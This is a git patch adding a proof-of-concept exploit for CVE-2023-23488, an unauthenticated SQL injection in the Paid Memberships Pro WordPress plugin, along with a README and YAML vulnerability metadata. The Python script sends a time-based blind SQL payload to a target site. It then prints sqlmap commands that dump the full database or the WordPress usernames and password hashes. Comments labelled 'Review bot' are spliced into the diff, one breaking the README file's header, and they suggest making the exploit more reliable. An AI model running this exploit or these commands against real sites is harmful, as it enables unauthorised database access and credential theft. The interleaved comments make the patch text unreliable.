From e710cc2601147fcde6e03f550985c3e6bbc60879 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=90=95=E6=B3=8A=E4=BC=B8?=
Date: Sat, 6 May 2023 04:14:41 +0000
Subject: [PATCH 1/2] CVE-2023-23488 CVE-2023-23488 POC
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 吕泊伸
---
 .../2023/CVE-2023-23488/CVE-2023-23488.py | 59 +++++++++++++++++++
 cve/WordPress/2023/CVE-2023-23488/README.md | 24 ++++++++
 cve/WordPress/2023/yaml/CVE-2023-23488.yaml | 20 +++++++
 3 files changed, 103 insertions(+)
 create mode 100644 cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py
 create mode 100644 cve/WordPress/2023/CVE-2023-23488/README.md
 create mode 100644 cve/WordPress/2023/yaml/CVE-2023-23488.yaml
diff --git a/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py b/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py
new file mode 100644
index 00000000..cc17f5aa
--- /dev/null
+++ b/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py
@@ -0,0 +1,59 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# https://github.com/r3nt0n
+#
+# Exploit Title: Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
+#
+# Exploit Author: r3nt0n
+# CVE: CVE-2023-23488
+# Date: 2023/01/24
+# Vulnerability discovered by Joshua Martinelle
+# Vendor Homepage: https://www.paidmembershipspro.com
+# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
+# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
+# Version: < 2.9.8
+# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
+#
+# Running this script against a WordPress instance with Paid Membership Pro plugin
+# tells you if the target is vulnerable.
+# As the SQL injection technique required to exploit it is Time-based blind, instead of
+# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
+# to dump the whole database (probably very time-consuming) or specific chose data like
+# usernames and passwords.
+#
+# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress
+
+import sys
+import requests
+
+def get_request(target_url, delay="1"):
+ payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
+ data = {'rest_route': '/pmpro/v1/order',
+ 'code': payload}
+ return requests.get(target_url, params=data).elapsed.total_seconds()
+
+print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')
+if len(sys.argv) != 2:
+ print('Usage: {} '.format("python3 CVE-2023-23488.py"))
+ print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
+ sys.exit(1)
+
+target_url = sys.argv[1]
+try:
+ print('[-] Testing if the target is vulnerable...')
+ req = requests.get(target_url, timeout=15)
+except:
+ print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
+ sys.exit(2)
+
+if get_request(target_url, "1") >= get_request(target_url, "2"):
+ print('{}[!]
The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
+ sys.exit(3)
+print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
+print('\n[+] You can dump the whole WordPress database with:')
+print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
+print('\n[+] To dump data from specific tables:')
+print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
+print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
+print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
+sys.exit(0)
\ No newline at end of file
diff --git a/cve/WordPress/2023/CVE-2023-23488/README.md b/cve/WordPress/2023/CVE-2023-23488/README.md
new file mode 100644
index 00000000..864263de
--- /dev/null
+++ b/cve/WordPress/2023/CVE-2023-23488/README.md
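Review bot: The bare `except:` around the reachability probe in the `try` block near the end of the hunk also catches `SystemExit` and `KeyboardInterrupt`, so a Ctrl-C during the probe is reported as "Target is unreachable" and exits with code 2; narrowing it to `except requests.RequestException:` keeps the message truthful. The response bound to `req` on the line above is never read, so `requests.get(target_url, timeout=15)` can stand on its own. The two `requests.get` calls inside `get_request` pass no `timeout=`, unlike the probe, so a host that stops answering after the probe leaves the script blocked indefinitely; accepting a timeout in `get_request` and passing it through as `requests.get(target_url, params=data, timeout=timeout)` makes the failure mode consistent with the probe. The file also opens with `#!/usr/bin/env python` while every usage line and the README say `python3`; `#!/usr/bin/env python3` matches the documented invocation.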
@@ -0,0 +1,24 @@
+# CVE-2023-23488-PoC
+Unauthenticated SQL Injection - Paid Memberships Pro < 2.9.8 (WordPress Plugin)
+
+Running this script against a WordPress instance with Paid Membership Pro plugin
+tells you if the target is vulnerable.
+As the SQL injection technique required to exploit it is Time-based blind, instead of
+trying to directly exploit the vuln, it will generate the appropriate sqlmap command
+to dump the whole database (probably very time-consuming) or specific chose data like
+usernames and passwords.
+
+Usage example:
+
+```shell
+python3 CVE-2023-23488.py http://127.0.0.1/wordpress
+```
+
+
+## References
+
++ Credits to **Joshua Martinelle**, who discovered the vulnerability
++ ExploitDB link: https://www.exploit-db.com/exploits/51235
++ Vendor Homepage: https://www.paidmembershipspro.com
++ Vulnerable software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
++ Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
diff --git a/cve/WordPress/2023/yaml/CVE-2023-23488.yaml b/cve/WordPress/2023/yaml/CVE-2023-23488.yaml
new file mode 100644
index 00000000..2707ba62
--- /dev/null
+++ b/cve/WordPress/2023/yaml/CVE-2023-23488.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-23488
+source: https://github.com/r3nt0n/CVE-2023-23488-PoC
+info:
+ name: WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。
+ severity: critical
+ description:
+ WordPress Plugin The Paid Memberships Pro 2.9.8 版本之前存在SQL注入漏洞,该漏洞源于 /pmpro/v1/order 的 code 参数存在 SQL 注入问题。该poc展示了如何利用该漏洞
+ scope-of-influence:
+ WordPress Plugin The Paid Memberships Pro ≤ 2.9.8
+ reference:
+ - https://packetstormsecurity.com/files/171661/WordPress-Paid-Memberships-Pro-2.9.8-SQL-Injection.html
+ - https://www.tenable.com/security/research/tra-2023-2
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-23488
+ cwe-id: CWE-89
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023, WordPress
\ No newline at end of file
-- Gitee
From ae9ac43cddada4fe0c07294a400bc5dde96dc25e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=90=95=E6=B3=8A=E4=BC=B8?=
Date: Sat, 6 May 2023 04:15:44 +0000
Subject: [PATCH 2/2] update other_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 吕泊伸
---
 other_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/other_list.yaml b/other_list.yaml
index 4627b27d..bf286e5e 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -66,6 +66,7 @@ cve:
 cnvd:
 WordPress:
 - CVE-2019-8942
+ - CVE-2023-23488
 Zimbra:
 - CVE-2022-41352
 cnvd:
-- Gitee
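Review bot: `scope-of-influence` gives the affected range as `≤ 2.9.8`, which contradicts the `description` two lines above it ("2.9.8 版本之前", i.e. versions before 2.9.8) and the `# Version: < 2.9.8` header of the PoC added in the same commit; since every other statement on this commit treats 2.9.8 as outside the range, the entry should read `WordPress Plugin The Paid Memberships Pro < 2.9.8`. `cnvd-id: None` and `kve-id: None` are parsed by YAML as the string `None`, not as a null value; if anything consuming this file tests those fields for absence, leaving them empty (`cnvd-id:`) or using `null` is the unambiguous spelling, though that depends on how the repository's tooling reads the field, which is not visible here.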